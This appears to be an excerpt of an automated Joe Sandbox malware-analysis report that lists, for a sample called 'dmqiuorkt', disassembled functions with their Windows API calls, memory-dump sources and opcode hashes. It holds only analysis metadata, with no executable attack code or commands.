                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                            • Opcode ID: cd4ae6c4b44fd1288ee0d311b4a5e9afb5cbf210fa616fbe17fed99da1c6e7f7
                                                                                                                                                                            • Instruction ID: af9cc295c53a005cfff0e18804a6cbd0f854f8b6e60bed9f73dfe56f29f2fdba
                                                                                                                                                                            • Opcode Fuzzy Hash: cd4ae6c4b44fd1288ee0d311b4a5e9afb5cbf210fa616fbe17fed99da1c6e7f7
                                                                                                                                                                            • Instruction Fuzzy Hash: 0E816F71208345AFD714DF28C885E2ABBE5FF94308F14855DF4598B2A2DB31ED49CB92
                                                                                                                                                                            Function 008B003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 008B0049
                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 008B00F0
                                                                                                                                                                            • VariantCopy.OLEAUT32(008B02F4,00000000), ref: 008B0119
                                                                                                                                                                            • VariantClear.OLEAUT32(008B02F4), ref: 008B013D
                                                                                                                                                                            • VariantCopy.OLEAUT32(008B02F4,00000000), ref: 008B0141
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 008B014B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3859894641-0
                                                                                                                                                                            • Opcode ID: ae92bbdb39c66a6e341b66eba784bddc8194cd1199ebeab8c2a667d240449265
                                                                                                                                                                            • Instruction ID: 165bb1793964cb7807259200a69da3da733caae4854ee47545497fb1772c6b5b
                                                                                                                                                                            • Opcode Fuzzy Hash: ae92bbdb39c66a6e341b66eba784bddc8194cd1199ebeab8c2a667d240449265
                                                                                                                                                                            • Instruction Fuzzy Hash: 60510935540304EECF25AB689889BAAB3A4FF55314F14804BE906DF396EB709C48CF56
                                                                                                                                                                            Function 008E8B3A Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,008AFB8F,00000000,?,?,00000000,?,008939BC,00000004,00000000,00000000), ref: 008E8BAB
                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 008E8BD1
                                                                                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008E8C30
                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 008E8C44
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 008E8C6A
                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008E8C8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                            • Opcode ID: e2dec27cc0bdfee8684aa6e903da40566c3a753f763ea8c19960f83572fb51c8
                                                                                                                                                                            • Instruction ID: 1bc07df5fe238feb41b0b6af332d1f9a0a5a67a8f8d3eef412f8d5795caea144
                                                                                                                                                                            • Opcode Fuzzy Hash: e2dec27cc0bdfee8684aa6e903da40566c3a753f763ea8c19960f83572fb51c8
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C415474605284EFDB25CF25C989BA97BE1FB47314F284169E54C8F2A2CB31A845CF50
                                                                                                                                                                            Function 008C6178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008C61D5
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 008C62EF
                                                                                                                                                                            • CoCreateInstance.OLE32(008F0CC4,00000000,00000001,008F0B34,?), ref: 008C6308
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 008C6326
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                            • API String ID: 3172280962-24824748
                                                                                                                                                                            • Opcode ID: bd338834dc31ba4ae6006ce7a63785be4ca8f641c6608750c1abaea281017eb6
                                                                                                                                                                            • Instruction ID: bf6e91e900fc858fd5fbe1486fd881c50658a91d15fba498a2b837a16c9cc6dc
                                                                                                                                                                            • Opcode Fuzzy Hash: bd338834dc31ba4ae6006ce7a63785be4ca8f641c6608750c1abaea281017eb6
                                                                                                                                                                            • Instruction Fuzzy Hash: C6D10E716042159FC714DF28C484A2ABBF5FF89714F14886DF88ADB261EB31EC49CB92
                                                                                                                                                                            Function 008B2104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008B210F
                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 008B211B
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008B2124
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008B212C
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B2135
                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 008B213C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 146765662-0
                                                                                                                                                                            • Opcode ID: ec95f4ccf6cf78ad0afe2d06c2135e5df0c674e51234fb903c132431e034fcef
                                                                                                                                                                            • Instruction ID: ded97e4078f9badfe0aa9019a72fccce4e47245ae1a6face111cb7f51d4ee8c5
                                                                                                                                                                            • Opcode Fuzzy Hash: ec95f4ccf6cf78ad0afe2d06c2135e5df0c674e51234fb903c132431e034fcef
                                                                                                                                                                            • Instruction Fuzzy Hash: EDE0E576004241BFDB015FA1ED4C90AFF39FF49322B104220F2358A170DB329424DB50
                                                                                                                                                                            Function 008E46DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E4794
                                                                                                                                                                            • IsMenu.USER32(?), ref: 008E47A9
                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008E47F1
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 008E4804
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                                                            • Opcode ID: 149a8d3b8058111c23ff8f8cf9bf322923fc7a0140516c3ccde4d2aa7126ddea
                                                                                                                                                                            • Instruction ID: ca91539900c39efb49a73a424b3b760dbc9cdcb5719f80127353f05a7bfb86c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 149a8d3b8058111c23ff8f8cf9bf322923fc7a0140516c3ccde4d2aa7126ddea
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C414A74A10299EFEB20CF55D884AAABBB5FF06314F045129E9099B251C730ED54CF90
                                                                                                                                                                            Function 008B2672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008B26F6
                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008B2709
                                                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 008B2739
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                                                                                            • Opcode ID: 9d7c3a5e8d4b88da9ddc7edd9f31b7e8326c4cb7bf72a88823a3615e003e5796
                                                                                                                                                                            • Instruction ID: 3b87cc337e11362091633bffe43bc2f679a90875bded922cf9b6889404603456
                                                                                                                                                                            • Opcode Fuzzy Hash: 9d7c3a5e8d4b88da9ddc7edd9f31b7e8326c4cb7bf72a88823a3615e003e5796
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A210571A40108BFDB14ABA8CC86CFEB7B8FF56754B104119F821E72E1CF38490A9624
                                                                                                                                                                            Function 00856332 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0085637F,?,?,008560AA,?,00000001,?,?,00000000), ref: 0085633E
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00856350
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,0085637F,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856362
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                            • Opcode ID: d4f382a12ef463b6428e31ff76a308c62b6bbef08360ac446cc621305eb9b627
                                                                                                                                                                            • Instruction ID: 0d6730e37079be3c6f12552da41ef34b7dd2ec8d856cc822c73aaf8c45606f22
                                                                                                                                                                            • Opcode Fuzzy Hash: d4f382a12ef463b6428e31ff76a308c62b6bbef08360ac446cc621305eb9b627
                                                                                                                                                                            • Instruction Fuzzy Hash: B4E08C32602B221792222716AC08AAAF628FF96B637490015FD00EB300EBA4CC1981B1
                                                                                                                                                                            Function 008562FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,008954C3,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856304
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00856316
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,008954C3,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856329
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                                                            • Opcode ID: 4f63b07337f2552830c6eacc53cbf1462c08c97f228bc71364689c436798024d
                                                                                                                                                                            • Instruction ID: 2ab76f24bd4f04534011aefe2595cd58958160e1098825e876c941531d5fbd79
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f63b07337f2552830c6eacc53cbf1462c08c97f228bc71364689c436798024d
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DD012356427615746222725AC189CEBE25FFCAB523850119BC01EB328DF65CD198590
                                                                                                                                                                            Function 008DACE6 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 008DAD86
                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008DAD94
                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008DADC7
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008DAF9C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                            • Opcode ID: 9307a2bd4a453abbff6e44d986dae9e7ca39445c2a2d1943246e7e9d768d5e62
                                                                                                                                                                            • Instruction ID: adb6d7e0158f633065e4d1eada78ec0c05dc9cd25fec3a4303a518893627353c
                                                                                                                                                                            • Opcode Fuzzy Hash: 9307a2bd4a453abbff6e44d986dae9e7ca39445c2a2d1943246e7e9d768d5e62
                                                                                                                                                                            • Instruction Fuzzy Hash: 43A178B1604301AFD724DF28C886B2AB7E5FB54714F14895EF999DB392DA70EC44CB82
                                                                                                                                                                            Function 008DC328 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008DD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DC00D,?,?), ref: 008DD314
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD350
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3C7
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3FD
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC404
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008DC45F
                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008DC4C2
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 008DC505
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008DC512
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                                                            • Opcode ID: 544cf4e006603743417945d7bfb4a1bcbc627802c8ec6037516a038c4078c649
                                                                                                                                                                            • Instruction ID: 0a0cc96ee93f13853d72072679b367ae5003bf39ec592db54eca5cb4d7a1fde9
                                                                                                                                                                            • Opcode Fuzzy Hash: 544cf4e006603743417945d7bfb4a1bcbc627802c8ec6037516a038c4078c649
                                                                                                                                                                            • Instruction Fuzzy Hash: 7E615D31108246AFD714DF24C494E2ABBE5FF84308F54859DF459CB2A2DB31ED49CB92
                                                                                                                                                                            Function 008BEC27 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008BE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008BD6E2,?), ref: 008BE629
                                                                                                                                                                              • Part of subcall function 008BE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008BD6E2,?), ref: 008BE642
                                                                                                                                                                              • Part of subcall function 008BE9C5: GetFileAttributesW.KERNELBASE(?,008BD755), ref: 008BE9C6
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 008BEC9F
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 008BECD8
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BEE17
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008BEE2F
                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 008BEE7C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                                                            • Opcode ID: c96836b5529e9ead00aa2bdf153155efd10e33c2e13c2099cf6a32459dad84ea
                                                                                                                                                                            • Instruction ID: 15f2827047b05c75b48b2d9e5a1f1c287b35283f55662029c53596a655aca5cd
                                                                                                                                                                            • Opcode Fuzzy Hash: c96836b5529e9ead00aa2bdf153155efd10e33c2e13c2099cf6a32459dad84ea
                                                                                                                                                                            • Instruction Fuzzy Hash: B0513EB20083859FC724EBA4D8819DBB7E8FF95310F00492EF589D3252EF74E6888756
                                                                                                                                                                            Function 008823E1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                            • Opcode ID: 5a307adc8ac04a51509f209f8d2407283d316b3d849577ff48df43d5cda4f41c
                                                                                                                                                                            • Instruction ID: 707ac393c0530272d241dcfdf42cd49c0b339c56e1d843110094f1c9797e2f68
                                                                                                                                                                            • Opcode Fuzzy Hash: 5a307adc8ac04a51509f209f8d2407283d316b3d849577ff48df43d5cda4f41c
